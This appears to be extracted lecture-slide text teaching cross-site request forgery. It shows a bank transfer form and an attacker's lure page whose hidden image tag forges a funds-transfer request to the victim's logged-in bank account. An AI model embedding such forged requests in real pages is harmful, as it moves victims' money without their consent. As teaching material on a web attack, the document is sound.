Cross Site Request Forgery
Cross Site Request Forgery
Victim has account at http://bank.com/ and loves the site because of "remember me" technology.
Attacker creates account and reverse engineers the "Transfer Funds" page.
<form action=
"transfer.php"
>
Transfer To: <input type=
"text"
name=
"to"
/>
Amount: <input type=
"text"
name=
"amt"
/>
</form>
Attacker lures Victim to visit his site.
<html>
Naked pictures of Celebrities here.
<img src=
"http://bank.com/transfer.php?to=66666&amt=1000000"
/>
</html>
From the server side, it sees a legitimate request from the client.